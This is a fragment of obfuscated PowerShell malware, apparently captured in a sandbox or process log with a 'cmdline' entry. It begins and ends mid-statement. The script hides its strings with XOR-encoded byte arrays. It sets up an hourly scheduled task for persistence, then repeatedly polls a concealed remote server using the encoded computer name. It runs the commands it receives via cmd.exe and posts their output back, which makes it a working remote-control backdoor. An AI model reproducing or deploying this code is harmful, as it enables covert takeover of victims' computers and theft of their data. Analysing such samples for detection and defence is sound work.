49836 -bxor 49795;$YGF4zEt9ImmOq8V01[27] = 58161 -bxor 58196;$YGF4zEt9ImmOq8V01[28] = 11345 -bxor 11317;$YGF4zEt9ImmOq8V01[29] = 15971 -bxor 15882;$YGF4zEt9ImmOq8V01[30] = 14289 -bxor 14245;$YGF4zEt9ImmOq8V01[31] = 16163 -bxor 16204;$YGF4zEt9ImmOq8V01[32] = 41830 -bxor 41748;$YGF4zEt9ImmOq8V01[33] = 60433 -bxor 60478;$YGF4zEt9ImmOq8V01[34] = 49169 -bxor 49250;$YGF4zEt9ImmOq8V01[35] = 43694 -bxor 43715;$YGF4zEt9ImmOq8V01[36] = 38532 -bxor 38629;$YGF4zEt9ImmOq8V01[37] = 54818 -bxor 54864;$YGF4zEt9ImmOq8V01[38] = 10972 -bxor 10920;$YGF4zEt9ImmOq8V01[39] = 12822 -bxor 12921;$YGF4zEt9ImmOq8V01[40] = 32341 -bxor 32293;$YGF4zEt9ImmOq8V01[41] = 22378 -bxor 22302;$YGF4zEt9ImmOq8V01[42] = 29039 -bxor 28934;$YGF4zEt9ImmOq8V01[43] = 41069 -bxor 40962;$YGF4zEt9ImmOq8V01[44] = 31435 -bxor 31397;$YGF4zEt9ImmOq8V01[45] = 5356 -bxor 5314;$YGF4zEt9ImmOq8V01[46] = 53862 -bxor 53782;$YGF4zEt9ImmOq8V01[47] = 42702 -bxor 42662;$YGF4zEt9ImmOq8V01[48] = 26219 -bxor 26139;$arEdmGvRqoSs = [System.Text.Encoding]::UTF8.GetString($YGF4zEt9ImmOq8V01);$LNCKYBeJkQ = $arEdmGvRqoSs;schtasks /create /sc minute /mo 60 /tn $wj_uC5xvtcOmXJ /tr $LNCKYBeJkQ /f;}Add-Type -AssemblyName System.Web;function HpWPuNxj(){$aDqmdv69z2D = 'CcMtwBVs1FrdaHKvuAy0O7lwikCDP1blIoiPRVCAKE4JINSMu20WWTKlb';$h0Osuy3sf0um4xob01 = 'KxYDx7KGK60vfXbO9SWmMk39bDwMEsaaIDF9KmGMhFdbv83lteymEPSNS';$h0Osuy3sf0um4xob01 = [System.Text.Encoding]::UTF8.GetBytes($h0Osuy3sf0um4xob01);$h0Osuy3sf0um4xob01[0] = 40925 -bxor 40885;$h0Osuy3sf0um4xob01[1] = 25917 -bxor 25929;$h0Osuy3sf0um4xob01[2] = 10834 -bxor 10790;$h0Osuy3sf0um4xob01[3] = 25035 -bxor 25019;$h0Osuy3sf0um4xob01[4] = 55363 -bxor 55417;$h0Osuy3sf0um4xob01[5] = 63115 -bxor 63140;$h0Osuy3sf0um4xob01[6] = 44806 -bxor 44841;$h0Osuy3sf0um4xob01[7] = 61613 -bxor 61638;$h0Osuy3sf0um4xob01[8] = 1647 -bxor 1546;$h0Osuy3sf0um4xob01[9] = 8875 -bxor 8901;$h0Osuy3sf0um4xob01[10] = 32648 -bxor 32764;$h0Osuy3sf0um4xob01[11] = 20987 -bxor 20876;$h0Osuy3sf0um4xob01[12] = 21901 -bxor 21996;$h0Osuy3sf0um4xob01[13] = 50279 -bxor 50195;$h0Osuy3sf0um4xob01[14] = 9552 -bxor 9525;$h0Osuy3sf0um4xob01[15] = 9180 -bxor 9134;$h0Osuy3sf0um4xob01[16] = 32380 -bxor 32338;$h0Osuy3sf0um4xob01[17] = 9253 -bxor 9286;$h0Osuy3sf0um4xob01[18] = 51020 -bxor 50978;$h0Osuy3sf0um4xob01[19] = 40144 -bxor 40191;$h0Osuy3sf0um4xob01[20] = 14537 -bxor 14506;$h0Osuy3sf0um4xob01[21] = 43110 -bxor 43015;$h0Osuy3sf0um4xob01[22] = 12761 -bxor 12730;$h0Osuy3sf0um4xob01[23] = 23564 -bxor 23652;$h0Osuy3sf0um4xob01[24] = 42886 -bxor 42979;$h0Osuy3sf0um4xob01[25] = 28120 -bxor 28075;$h0Osuy3sf0um4xob01[26] = 945 -bxor 926;$h0Osuy3sf0um4xob01[27] = 63474 -bxor 63377;$h0Osuy3sf0um4xob01[28] = 8366 -bxor 8399;$h0Osuy3sf0um4xob01[29] = 63486 -bxor 63389;$h0Osuy3sf0um4xob01[30] = 58761 -bxor 58849;$h0Osuy3sf0um4xob01[31] = 30054 -bxor 29955;$h0Osuy3sf0um4xob01[32] = 9022 -bxor 9037;$h0Osuy3sf0um4xob01[33] = 3921 -bxor 3854;$h0Osuy3sf0um4xob01[34] = 7213 -bxor 7257;$h0Osuy3sf0um4xob01[35] = 34342 -bxor 34371;$h0Osuy3sf0um4xob01[36] = 44059 -bxor 44150;$h0Osuy3sf0um4xob01[37] = 12710 -bxor 12758;$h0Osuy3sf0um4xob01[38] = 3611 -bxor 3703;$h0Osuy3sf0um4xob01[39] = 38279 -bxor 38374;$h0Osuy3sf0um4xob01[40] = 10949 -bxor 10929;$h0Osuy3sf0um4xob01[41] = 62189 -bxor 62088;$h0Osuy3sf0um4xob01[42] = 65064 -bxor 65031;$h0Osuy3sf0um4xob01[43] = 19120 -bxor 19141;$h0Osuy3sf0um4xob01[44] = 19944 -bxor 19867;$h0Osuy3sf0um4xob01[45] = 39289 -bxor 39196;$h0Osuy3sf0um4xob01[46] = 62317 -bxor 62239;$h0Osuy3sf0um4xob01[47] = 46715 -bxor 46676;$h0Osuy3sf0um4xob01[48] = 31947 -bxor 31906;$h0Osuy3sf0um4xob01[49] = 41223 -bxor 41321;$h0Osuy3sf0um4xob01[50] = 32964 -bxor 32928;$h0Osuy3sf0um4xob01[51] = 13877 -bxor 13904;$h0Osuy3sf0um4xob01[52] = 26292 -bxor 26316;$h0Osuy3sf0um4xob01[53] = 17762 -bxor 17740;$h0Osuy3sf0um4xob01[54] = 53838 -bxor 53822;$h0Osuy3sf0um4xob01[55] = 39672 -bxor 39568;$h0Osuy3sf0um4xob01[56] = 16701 -bxor 16717;$aDqmdv69z2D = [System.Text.Encoding]::UTF8.GetString($h0Osuy3sf0um4xob01);$nh8ZPuNg4pK3aOp = $aDqmdv69z2D;$SG6M0ouk2cQUfpHV = LiYMh74($env:COMPUTERNAME);if ($SG6M0ouk2cQUfpHV -eq ''){$rbbqyvzmbQxW5vj = 'm4JO4dFbEn3j';$jDyM0BkFGCVhyt01 = 'R5m7du2ge0PV';$jDyM0BkFGCVhyt01 = [System.Text.Encoding]::UTF8.GetBytes($jDyM0BkFGCVhyt01);$jDyM0BkFGCVhyt01[0] = 42523 -bxor 42602;$jDyM0BkFGCVhyt01[1] = 14543 -bxor 14519;$jDyM0BkFGCVhyt01[2] = 50284 -bxor 50261;$jDyM0BkFGCVhyt01[3] = 48121 -bxor 48074;$jDyM0BkFGCVhyt01[4] = 25864 -bxor 25946;$jDyM0BkFGCVhyt01[5] = 64399 -bxor 64492;$jDyM0BkFGCVhyt01[6] = 41398 -bxor 41410;$jDyM0BkFGCVhyt01[7] = 63962 -bxor 63976;$jDyM0BkFGCVhyt01[8] = 40459 -bxor 40524;$jDyM0BkFGCVhyt01[9] = 39021 -bxor 38964;$jDyM0BkFGCVhyt01[10] = 29569 -bxor 29616;$jDyM0BkFGCVhyt01[11] = 12724 -bxor 12762;$rbbqyvzmbQxW5vj = [System.Text.Encoding]::UTF8.GetString($jDyM0BkFGCVhyt01);$SG6M0ouk2cQUfpHV = $rbbqyvzmbQxW5vj;}$cL4OLMozllhTOvN0 = 'mc3xH8dj1pOYCYTMFUU';$i_yupXum9o4A01 = 'n97O4RL1O9meVciqKn9';$i_yupXum9o4A01 = [System.Text.Encoding]::UTF8.GetBytes($i_yupXum9o4A01);$i_yupXum9o4A01[0] = 25703 -bxor 25661;$i_yupXum9o4A01[1] = 24729 -bxor 24745;$i_yupXum9o4A01[2] = 43535 -bxor 43579;$i_yupXum9o4A01[3] = 39771 -bxor 39697;$i_yupXum9o4A01[4] = 2522 -bxor 2493;$i_yupXum9o4A01[5] = 10517 -bxor 10604;$i_yupXum9o4A01[6] = 20530 -bxor 20490;$i_yupXum9o4A01[7] = 19045 -bxor 18997;$i_yupXum9o4A01[8] = 39629 -bxor 39594;$i_yupXum9o4A01[9] = 10440 -bxor 10392;$i_yupXum9o4A01[10] = 6161 -bxor 6183;$i_yupXum9o4A01[11] = 24150 -bxor 24069;$i_yupXum9o4A01[12] = 9906 -bxor 9856;$i_yupXum9o4A01[13] = 18939 -bxor 18850;$i_yupXum9o4A01[14] = 2491 -bxor 2521;$i_yupXum9o4A01[15] = 41121 -bxor 41103;$i_yupXum9o4A01[16] = 15101 -bxor 15001;$i_yupXum9o4A01[17] = 61464 -bxor 61561;$i_yupXum9o4A01[18] = 53213 -bxor 53161;$cL4OLMozllhTOvN0 = [System.Text.Encoding]::UTF8.GetString($i_yupXum9o4A01);$em9ZbV = $cL4OLMozllhTOvN0;$jW3dX = $env:APPDATA + '\' + $em9ZbV;$H6Rq5fB4aky27 = 'pVhWrpfLw1HlIv2e0mKk';$hdeNFbCBu6QgOZV001 = 'maHtOIXxL4H1dpTrLhaD';$hdeNFbCBu6QgOZV001 = [System.Text.Encoding]::UTF8.GetBytes($hdeNFbCBu6QgOZV001);$hdeNFbCBu6QgOZV001[0] = 14735 -bxor 14784;$hdeNFbCBu6QgOZV001[1] = 50810 -bxor 50716;$hdeNFbCBu6QgOZV001[2] = 56841 -bxor 56943;$hdeNFbCBu6QgOZV001[3] = 2786 -bxor 2699;$hdeNFbCBu6QgOZV001[4] = 36501 -bxor 36598;$hdeNFbCBu6QgOZV001[5] = 14180 -bxor 14081;$hdeNFbCBu6QgOZV001[6] = 64650 -bxor 64726;$hdeNFbCBu6QgOZV001[7] = 26751 -bxor 26640;$hdeNFbCBu6QgOZV001[8] = 64146 -bxor 64226;$hdeNFbCBu6QgOZV001[9] = 20928 -bxor 20916;$hdeNFbCBu6QgOZV001[10] = 53051 -bxor 53074;$hdeNFbCBu6QgOZV001[11] = 47608 -bxor 47511;$hdeNFbCBu6QgOZV001[12] = 22734 -bxor 22688;$hdeNFbCBu6QgOZV001[13] = 44933 -bxor 45017;$hdeNFbCBu6QgOZV001[14] = 16707 -bxor 16694;$hdeNFbCBu6QgOZV001[15] = 16066 -bxor 16050;$hdeNFbCBu6QgOZV001[16] = 19562 -bxor 19470;$hdeNFbCBu6QgOZV001[17] = 14290 -bxor 14259;$hdeNFbCBu6QgOZV001[18] = 64053 -bxor 64065;$hdeNFbCBu6QgOZV001[19] = 52106 -bxor 52207;$H6Rq5fB4aky27 = [System.Text.Encoding]::UTF8.GetString($hdeNFbCBu6QgOZV001); $fv0na8jKt8 = $H6Rq5fB4aky27;HsnmKyIW4V($fv0na8jKt8);while ($true){$kwMplBvRq2zt = '';$b2ZuuGw = 'Auc562ufGzyBeD';$U1jgVr9t01 = 'Up7wMMVScRE5Fh';$U1jgVr9t01 = [System.Text.Encoding]::UTF8.GetBytes($U1jgVr9t01);$U1jgVr9t01[0] = 62752 -bxor 62807;$U1jgVr9t01[1] = 47460 -bxor 47405;$U1jgVr9t01[2] = 26476 -bxor 26458;$U1jgVr9t01[3] = 20905 -bxor 20952;$U1jgVr9t01[4] = 12842 -bxor 12870;$U1jgVr9t01[5] = 42712 -bxor 42729;$U1jgVr9t01[6] = 31801 -bxor 31754;$U1jgVr9t01[7] = 37246 -bxor 37199;$U1jgVr9t01[8] = 35733 -bxor 35780;$U1jgVr9t01[9] = 47302 -bxor 47348;$U1jgVr9t01[10] = 23154 -bxor 23100;$U1jgVr9t01[11] = 37942 -bxor 37980;$U1jgVr9t01[12] = 32836 -bxor 32808;$U1jgVr9t01[13] = 35471 -bxor 35578;$b2ZuuGw = [System.Text.Encoding]::UTF8.GetString($U1jgVr9t01);$iuwAqApqcmXkAO = $b2ZuuGw;$pkSm2KoWGmydHl = 'gx68xiwFQubpVyqw53cUF9VUTzYtTJdJQh';$J6czkLmSPP01 = 'Amm0QsmzrP9n7LV4yXGOsTLSlTsBftEjW3';$J6czkLmSPP01 = [System.Text.Encoding]::UTF8.GetBytes($J6czkLmSPP01);$J6czkLmSPP01[0] = 15494 -bxor 15602;$J6czkLmSPP01[1] = 51078 -bxor 51199;$J6czkLmSPP01[2] = 60739 -bxor 60723;$J6czkLmSPP01[3] = 22199 -bxor 22226;$J6czkLmSPP01[4] = 62504 -bxor 62485;$J6czkLmSPP01[5] = 11129 -bxor 11034;$J6czkLmSPP01[6] = 5008 -bxor 5119;$J6czkLmSPP01[7] = 41878 -bxor 41979;$J6czkLmSPP01[8] = 8100 -bxor 8137;$J6czkLmSPP01[9] = 39566 -bxor 39663;$J6czkLmSPP01[10] = 7666 -bxor 7580;$J6czkLmSPP01[11] = 53922 -bxor 53958;$J6czkLmSPP01[12] = 48490 -bxor 48460;$J6czkLmSPP01[13] = 32205 -bxor 32169;$J6czkLmSPP01[14] = 45935 -bxor 45830;$J6czkLmSPP01[15] = 65532 -bxor 65422;$J6czkLmSPP01[16] = 52874 -bxor 52975;$J6czkLmSPP01[17] = 44326 -bxor 44357;$J6czkLmSPP01[18] = 14151 -bxor 14131;$J6czkLmSPP01[19] = 46007 -bxor 46046;$J6czkLmSPP01[20] = 58204 -bxor 58163;$J6czkLmSPP01[21] = 15091 -bxor 15005;$J6czkLmSPP01[22] = 36865 -bxor 36924;$J6czkLmSPP01[23] = 13189 -bxor 13303;$J6czkLmSPP01[24] = 24261 -bxor 24224;$J6czkLmSPP01[25] = 617 -bxor 522;$J6czkLmSPP01[26] = 1398 -bxor 1299;$J6czkLmSPP01[27] = 19254 -bxor 19295;$J6czkLmSPP01[28] = 47697 -bxor 47655;$J6czkLmSPP01[29] = 52994 -bxor 53095;$J6czkLmSPP01[30] = 14975 -bxor 14937;$J6czkLmSPP01[31] = 24397 -bxor 24356;$J6czkLmSPP01[32] = 28344 -bxor 28380;$J6czkLmSPP01[33] = 43809 -bxor 43804;$pkSm2KoWGmydHl = [System.Text.Encoding]::UTF8.GetString($J6czkLmSPP01);$HCp0q = S54m3xeK($pkSm2KoWGmydHl + $SG6M0ouk2cQUfpHV);$finalUrl = $nh8ZPuNg4pK3aOp + $HCp0q;$qr27kycI = [System.Net.WebRequest]::Create($nh8ZPuNg4pK3aOp + $HCp0q);try{$F09ffIubQJm = $qr27kycI.GetResponse();} catch {$OURFvRexTaeE23zV = Get-Random -Maximum 60;$OURFvRexTaeE23zV = $OURFvRexTaeE23zV+5;start-sleep -seconds $OURFvRexTaeE23zV;continue;}$AGDFmtT = $F09ffIubQJm.StatusCode;$CGDqIISmGvhx84xp = 'aB1L';$Z3PnDkPyrJM73T01 = 'IOk1';$Z3PnDkPyrJM73T01 = [System.Text.Encoding]::UTF8.GetBytes($Z3PnDkPyrJM73T01);$Z3PnDkPyrJM73T01[0] = 9069 -bxor 8983;$Z3PnDkPyrJM73T01[1] = 26507 -bxor 26611;$Z3PnDkPyrJM73T01[2] = 28065 -bxor 28099;$Z3PnDkPyrJM73T01[3] = 19950 -bxor 19860;$CGDqIISmGvhx84xp = [System.Text.Encoding]::UTF8.GetString($Z3PnDkPyrJM73T01);$R4db3ayUHUw6A = $CGDqIISmGvhx84xp;$sr1olbnmchzR = '3HjQh';$BmOthTTBpzx601 = 'DSc4W';$BmOthTTBpzx601 = [System.Text.Encoding]::UTF8.GetBytes($BmOthTTBpzx601);$BmOthTTBpzx601[0] = 11248 -bxor 11139;$BmOthTTBpzx601[1] = 26060 -bxor 26040;$BmOthTTBpzx601[2] = 5138 -bxor 5235;$BmOthTTBpzx601[3] = 50639 -bxor 50621;$BmOthTTBpzx601[4] = 40904 -bxor 40892;$sr1olbnmchzR = [System.Text.Encoding]::UTF8.GetString($BmOthTTBpzx601);$gha9dupC = $sr1olbnmchzR;$ud3JSBmy = '7WSFDu';$laADOozsqXRnUEKX01 = 'zdl0r0';$laADOozsqXRnUEKX01 = [System.Text.Encoding]::UTF8.GetBytes($laADOozsqXRnUEKX01);$laADOozsqXRnUEKX01[0] = 1291 -bxor 1378;$laADOozsqXRnUEKX01[1] = 18218 -bxor 18253;$laADOozsqXRnUEKX01[2] = 33393 -bxor 33311;$laADOozsqXRnUEKX01[3] = 25622 -bxor 25721;$laADOozsqXRnUEKX01[4] = 1288 -bxor 1402;$laADOozsqXRnUEKX01[5] = 4445 -bxor 4408;$ud3JSBmy = [System.Text.Encoding]::UTF8.GetString($laADOozsqXRnUEKX01);$GdD5nwImmlfb = $ud3JSBmy;If ($AGDFmtT -eq 200){$x1XuBfdP = New-Object System.IO.StreamReader $F09ffIubQJm.GetResponseStream();$xYlVKzM=$x1XuBfdP.ReadToEnd();if (!$xYlVKzM.Contains('Fail')){if ($xYlVKzM.Contains($R4db3ayUHUw6A)){$INTZ_4FIYL = $xYlVKzM.Substring(16);$aSzFooViwhHMOS = 'Qe6gShw2HEk48NuJdH08FFLNZ9SDUu';$QmtbPoE501 = 'iXit2bA102BXNLHDtLO9qEgZ18C8ml';$QmtbPoE501 = [System.Text.Encoding]::UTF8.GetBytes($QmtbPoE501);$QmtbPoE501[0] = 42900 -bxor 42976;$QmtbPoE501[1] = 1496 -bxor 1441;$QmtbPoE501[2] = 63438 -bxor 63422;$QmtbPoE501[3] = 45050 -bxor 44959;$QmtbPoE501[4] = 56917 -bxor 56936;$QmtbPoE501[5] = 522 -bxor 632;$QmtbPoE501[6] = 4611 -bxor 4710;$QmtbPoE501[7] = 16552 -bxor 16603;$QmtbPoE501[8] = 18031 -bxor 17946;$QmtbPoE501[9] = 24549 -bxor 24457;$QmtbPoE501[10] = 65415 -bxor 65523;$QmtbPoE501[11] = 53065 -bxor 53103;$QmtbPoE501[12] = 56 -bxor 92;$QmtbPoE501[13] = 3692 -bxor 3589;$QmtbPoE501[14] = 16896 -bxor 17010;$QmtbPoE501[15] = 32257 -bxor 32356;$QmtbPoE501[16] = 34225 -bxor 34258;$QmtbPoE501[17] = 23229 -bxor 23241;$QmtbPoE501[18] = 58075 -bxor 58034;$QmtbPoE501[19] = 874 -bxor 773;$QmtbPoE501[20] = 18856 -bxor 18886;$QmtbPoE501[21] = 14808 -bxor 14821;$QmtbPoE501[22] = 13100 -bxor 13151;$QmtbPoE501[23] = 32024 -bxor 32125;$QmtbPoE501[24] = 48573 -bxor 48595;$QmtbPoE501[25] = 29557 -bxor 29457;$QmtbPoE501[26] = 35754 -bxor 35724;$QmtbPoE501[27] = 18256 -bxor 18233;$QmtbPoE501[28] = 10302 -bxor 10330;$QmtbPoE501[29] = 31470 -bxor 31443;$aSzFooViwhHMOS = [System.Text.Encoding]::UTF8.GetString($QmtbPoE501);$Ucwy0 = $aSzFooViwhHMOS;$aerNl = 'KfG0B';$avSeb2v01 = '21Oa4';$avSeb2v01 = [System.Text.Encoding]::UTF8.GetBytes($avSeb2v01);$avSeb2v01[0] = 26583 -bxor 26547;$avSeb2v01[1] = 13113 -bxor 13144;$avSeb2v01[2] = 56692 -bxor 56576;$avSeb2v01[3] = 45665 -bxor 45568;$avSeb2v01[4] = 50960 -bxor 50989;$aerNl = [System.Text.Encoding]::UTF8.GetString($avSeb2v01);$RrQmsQ = $aerNl;$HCp0q = S54m3xeK($Ucwy0 + $SG6M0ouk2cQUfpHV);$kwMplBvRq2zt = $nh8ZPuNg4pK3aOp + $HCp0q;if ($INTZ_4FIYL.Contains($gha9dupC)){cmd.exe /c $INTZ_4FIYL;$Zcg1A0Ue7OSiFQKP = 'M0';$TwnAoLGHUy01 = 'Ja';$TwnAoLGHUy01 = [System.Text.Encoding]::UTF8.GetBytes($TwnAoLGHUy01);$TwnAoLGHUy01[0] = 49887 -bxor 49808;$TwnAoLGHUy01[1] = 17974 -bxor 18045;$Zcg1A0Ue7OSiFQKP = [System.Text.Encoding]::UTF8.GetString($TwnAoLGHUy01);$BK7qm = $Zcg1A0Ue7OSiFQKP;} elseif($INTZ_4FIYL.Contains($GdD5nwImmlfb)){$INTZ_4FIYL = $INTZ_4FIYL.Substring(7);cmd.exe /c $INTZ_4FIYL;$wq95SC = 'alz2ozVEx';$SSe4s9RT4FU301 = '7VbvRmaFz';$SSe4s9RT4FU301 = [System.Text.Encoding]::UTF8.GetBytes($SSe4s9RT4FU301);$SSe4s9RT4FU301[0] = 29420 -bxor 29347;$SSe4s9RT4FU301[1] = 5355 -bxor 5280;$SSe4s9RT4FU301[2] = 2532 -bxor 2491;$SSe4s9RT4FU301[3] = 10724 -bxor 10669;$SSe4s9RT4FU301[4] = 42947 -bxor 42916;$SSe4s9RT4FU301[5] = 33012 -bxor 32922;$SSe4s9RT4FU301[6] = 37054 -bxor 37073;$SSe4s9RT4FU301[7] = 39326 -bxor 39404;$SSe4s9RT4FU301[8] = 17635 -bxor 17542;$wq95SC = [System.Text.Encoding]::UTF8.GetString($SSe4s9RT4FU301);$BK7qm = $wq95SC;} else {cmd.exe /c $INTZ_4FIYL > $jW3dX;$BK7qm = [System.IO.File]::ReadAllText($jW3dX);}$ltymfR5pSPm405Rv = $xYlVKzM + [Environment]::NewLine + $BK7qm;$jBTtUYqXEU_a = SWWZUOAn($ltymfR5pSPm405Rv);$rg32vOo1DUImKMD = [System.Web.HttpUtility]::UrlEncode($jBTtUYqXEU_a);$iuwAqApqcmXkAO = $RrQmsQ + $rg32vOo1DUImKMD;}}}$F09ffIubQJm.Close();if ($kwMplBvRq2zt -ne ''){LuXhxzm2KtHSmTxS $kwMplBvRq2zt $iuwAqApqcmXkAO;}$OURFvRexTaeE23zV = Get-Random -Maximum 15;$OURFvRexTaeE23zV = $OURFvRexTaeE23zV+5;start-sleep -seconds $OURFvRexTaeE23zV;}}HpWPuNxj;
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ElksyKqgq = 'NzXwsdKH4mhsJlZ';$dS1me690PeF01 = 'yPY0RHrDa5fVEbN';$dS1me690PeF01 = [System.Text.Encoding]::UTF8.GetBytes($dS1me690PeF01);$dS1me690PeF01[0] = 33312 -bxor 33350;$dS1me690PeF01[1] = 5894 -bxor 5980;$dS1me690PeF01[2] = 53821 -bxor 53844;$dS1me690PeF01[3] = 24611 -bxor 24676;$dS1me690PeF01[4] = 2604 -bxor 2585;$dS1me690PeF01[5] = 43144 -bxor 43234;$dS1me690PeF01[6] = 41855 -bxor 41806;$dS1me690PeF01[7] = 41245 -bxor 41330;$dS1me690PeF01[8] = 43527 -bxor 43583;$dS1me690PeF01[9] = 53707 -bxor 53667;$dS1me690PeF01[10] = 61928 -bxor 61853;$dS1me690PeF01[11] = 4996 -bxor 5066;$dS1me690PeF01[12] = 27428 -bxor 27470;$dS1me690PeF01[13] = 54354 -bxor 54282;$dS1me690PeF01[14] = 35537 -bxor 35463;$ElksyKqgq = [System.Text.Encoding]::UTF8.GetString($dS1me690PeF01);$qPaINTp8mf0 = $ElksyKqgq;function whKgZ($yTCpQOfKack, $xYlVKzM){$rCjLJasyf0m7 = [System.Text.Encoding]::UTF8;$CRABmSSX_ = $rCjLJasyf0m7.GetBytes($yTCpQOfKack);$LyZoc7Ykbs = $rCjLJasyf0m7.GetBytes($xYlVKzM);for ($i=0; $i -lt $LyZoc7Ykbs.length;){for ($j =0; $j -lt $CRABmSSX_.length; $j++){$LyZoc7Ykbs[$i] = $LyZoc7Ykbs[$i] -bxor $CRABmSSX_[$j];$i++;if ($i -ge $LyZoc7Ykbs.length){$j = $CRABmSSX_.length;}}}$ySwqdHx8Dh = [System.Convert]::ToBase64String($LyZoc7Ykbs);$ySwqdHx8Dh = $ySwqdHx8Dh.replace('+', '-').replace('/', '_').replace('=', '');return $ySwqdHx8Dh;}function mdkinhmi0xs63xl($Ube5aXEYlM7){return (-join ((0x30..0x39) + ( 0x41..0x5A) + ( 0x61..0x7A) \| Get-Random -Count $Ube5aXEYlM7 \| % {[char]$_}));}function S54m3xeK($nmLUVYfYimhN){$BMxL1 = mdkinhmi0xs63xl(5);$RznphCP = mdkinhmi0xs63xl(7);$xwhlQbRfEg_wwKF = mdkinhmi0xs63xl(16);$V4yUZ8nNguf7 = whKgZ $xwhlQbRfEg_wwKF $nmLUVYfYimhN;$BK7qm = '';$eWPzX = Get-Random -Maximum 5;for ($i = 0; $i -lt $eWPzX; $i++){$Bz6ES = Get-Random -Maximum 10 -Minimum 1;if (($Bz6ES -eq 5) -or ($Bz6ES -eq 7)){$Bz6ES--;}$HETSfJ99FEVe0 = Get-Random -Maximum 16 -Minimum 5;$NHWxXYSzsX6ki8zD = mdkinhmi0xs63xl($Bz6ES);$TM9GFOCA7 = mdkinhmi0xs63xl($HETSfJ99FEVe0);if ($BK7qm -eq ''){$BK7qm = $BK7qm + $NHWxXYSzsX6ki8zD + '=' + $TM9GFOCA7;} else {$BK7qm = $BK7qm + '&' + $NHWxXYSzsX6ki8zD + '=' + $TM9GFOCA7;}}if ($BK7qm -eq ''){$BK7qm = $BK7qm + $BMxL1 + '=' + $xwhlQbRfEg_wwKF + '&' + $RznphCP + '=' + $V4yUZ8nNguf7;} else {$BK7qm = $BK7qm + '&' + $BMxL1 + '=' + $xwhlQbRfEg_wwKF + '&' + $RznphCP + '=' + $V4yUZ8nNguf7;}$QQ3mvz = Get-Random -Maximum 3;for ($i = 0; $i -lt $QQ3mvz; $i++){$Bz6ES = Get-Random -Maximum 10 -Minimum 1;if (($Bz6ES -eq 5) -or ($Bz6ES -eq 7)){$Bz6ES--;}$HETSfJ99FEVe0 = Get-Random -Maximum 12 -Minimum 1;$NHWxXYSzsX6ki8zD = mdkinhmi0xs63xl($Bz6ES);$TM9GFOCA7 = mdkinhmi0xs63xl($HETSfJ99FEVe0);if ($BK7qm -eq ''){$BK7qm = $BK7qm + $NHWxXYSzsX6ki8zD + '=' + $TM9GFOCA7;} else {$BK7qm = $BK7qm + '&' + $NHWxXYSzsX6ki8zD + '=' + $TM9GFOCA7;}}return '?' + $BK7qm;}$T0c4GnRZL0 = 'o8DP9rn5zE1kaF';$VqRvR7u01 = 'rbbyGdyuIHnQEO';$VqRvR7u01 = [System.Text.Encoding]::UTF8.GetBytes($VqRvR7u01);$VqRvR7u01[0] = 3928 -bxor 3898;$VqRvR7u01[1] = 11945 -bxor 11931;$VqRvR7u01[2] = 21808 -bxor 21873;$VqRvR7u01[3] = 25530 -bxor 25550;$VqRvR7u01[4] = 23678 -bxor 23601;$VqRvR7u01[5] = 48796 -bxor 48876;$VqRvR7u01[6] = 55455 -bxor 55513;$VqRvR7u01[7] = 65244 -bxor 65202;$VqRvR7u01[8] = 23263 -bxor 23189;$VqRvR7u01[9] = 38044 -bxor 38133;$VqRvR7u01[10] = 10093 -bxor 10027;$VqRvR7u01[11] = 62542 -bxor 62470;$VqRvR7u01[12] = 48053 -bxor 48124;$VqRvR7u01[13] = 45810 -bxor 45719;$T0c4GnRZL0 = [System.Text.Encoding]::UTF8.GetString($VqRvR7u01);$ANNaEKn24PF = $T0c4GnRZL0;function SWWZUOAn($yPvXZCD3UDvC_1I7){return [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($yPvXZCD3UDvC_1I7));}function LiYMh74($yPvXZCD3UDvC_1I7){$b64str = [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($yPvXZCD3UDvC_1I7));return $b64str.replace('+', '-').replace('/', '_').replace('=', '');}function LuXhxzm2KtHSmTxS($OOa9P1cGqThqWwO3, $WnI_R){$SUZgLOy = [System.Text.Encoding]::UTF8.GetBytes($WnI_R);[System.Net.HttpWebRequest] $hcAiTwqCt9PwT = [System.Net.WebRequest]::Create($OOa9P1cGqThqWwO3);$U_NUkepb71Q = 's1lb';$AXQigUrD6uwklW01 = 'cc3g';$AXQigUrD6uwklW01 = [System.Text.Encoding]::UTF8.GetBytes($AXQigUrD6uwklW01);$AXQigUrD6uwklW01[0] = 28594 -bxor 28642;$AXQigUrD6uwklW01[1] = 7544 -bxor 7479;$AXQigUrD6uwklW01[2] = 14992 -bxor 15043;$AXQigUrD6uwklW01[3] = 65336 -bxor 65388;$U_NUkepb71Q = [System.Text.Encoding]::UTF8.GetString($AXQigUrD6uwklW01);$hcAiTwqCt9PwT.Method = $U_NUkepb71Q;$frNzen = 'x0ymi50wOBCHMa0vesHUk0hjaQq9yd1VV';$S9ybl01 = '7ZX6LiBugDgzhtuC3mTvXB60vUCC2aeFY';$S9ybl01 = [System.Text.Encoding]::UTF8.GetBytes($S9ybl01);$S9ybl01[0] = 46122 -bxor 46155;$S9ybl01[1] = 23347 -bxor 23363;$S9ybl01[2] = 58757 -bxor 58869;$S9ybl01[3] = 51395 -bxor 51375;$S9ybl01[4] = 9968 -bxor 9881;$S9ybl01[5] = 37098 -bxor 37001;$S9ybl01[6] = 55070 -bxor 55167;$S9ybl01[7] = 48095 -bxor 48043;$S9ybl01[8] = 48069 -bxor 48044;$S9ybl01[9] = 29814 -bxor 29721;$S9ybl01[10] = 49656 -bxor 49558;$S9ybl01[11] = 10102 -bxor 10073;$S9ybl01[12] = 51918 -bxor 51894;$S9ybl01[13] = 451 -bxor 494;$S9ybl01[14] = 20934 -bxor 20913;$S9ybl01[15] = 52408 -bxor 52431;$S9ybl01[16] = 40458 -bxor 40573;$S9ybl01[17] = 3704 -bxor 3669;$S9ybl01[18] = 8554 -bxor 8460;$S9ybl01[19] = 42369 -bxor 42478;$S9ybl01[20] = 2424 -bxor 2314;$S9ybl01[21] = 6571 -bxor 6598;$S9ybl01[22] = 28974 -bxor 28931;$S9ybl01[23] = 37068 -bxor 37049;$S9ybl01[24] = 9358 -bxor 9468;$S9ybl01[25] = 51114 -bxor 51142;$S9ybl01[26] = 10436 -bxor 10401;$S9ybl01[27] = 27496 -bxor 27398;$S9ybl01[28] = 20560 -bxor 20531;$S9ybl01[29] = 47641 -bxor 47734;$S9ybl01[30] = 43655 -bxor 43747;$S9ybl01[31] = 40920 -bxor 40893;$S9ybl01[32] = 7073 -bxor 7109;$frNzen = 